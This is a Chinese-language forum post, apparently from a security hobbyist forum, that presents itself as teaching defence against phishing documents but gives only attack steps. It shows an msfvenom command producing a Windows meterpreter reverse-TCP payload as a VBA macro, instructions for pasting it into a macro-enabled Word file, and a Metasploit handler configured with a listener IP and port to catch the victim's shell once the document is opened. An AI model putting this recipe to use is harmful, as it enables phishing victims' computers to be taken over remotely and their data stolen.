搜索
查看: 5179|回复: 0

通过认证邮件获取管理员权限

[复制链接]

714

主题

354

回帖

2669

积分

管理员

本论坛第一帅

积分
2669

热心会员推广达人宣传达人突出贡献优秀版主荣誉管理论坛元老

QQ
发表于 2020-4-23 13:53:48 | 显示全部楼层 |阅读模式 来自 甘肃
[md]> 网络认证是我们日常最为常见的一种测试手法,其目的是通过各种社会工程学的方法,让目标打开含有恶意代码的 `word` `excel` `ppt` 等文档。从而获取系统权限,本期学习来说说如何防御这种测试!

![emali](https://blog.bbskali.cn/usr/uploads/2020/04/271899027.png)
#### 首先我们利用 msf 生成 vbs

```
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.95 LPORT=4444 -f vba -o try.vba
```

![生成恶意 shell](https://niu.bbskali.cn/2cbc441419f229086d3025f07ff22cc6)
#### 设置 word
新建一个 word 文档,文件另存为 `启用宏的word` 文档
![启用宏的 word 文档](https://niu.bbskali.cn/0bf3c4f2338cd5277476a26632e6cc4a)
然后 `开发工具`——`visual Basic`
选择我们的项目 `ThisDocument` 双击打开,粘贴我们生成的 shell。
![](https://niu.bbskali.cn/c9ea8f1075a696174317819eafb6460d)
保存完成后,配置 msf。

```
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST ip
LHOST => 106.13.39.165
msf5 exploit(multi/handler) > set LPORT 5555
LPORT => 5555
```

当目标运行 word 文档后,在 msf 中便会得到反弹!
![](https://niu.bbskali.cn/39e5c79b63f59a47df5f9a28d85e96f3)
[/md]
有志者,事竟成,破釜沉舟,百二秦关终属楚. 苦心人,天不负, 卧薪尝胆 ,三千越甲可吞吴
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

快速回复 返回顶部 返回列表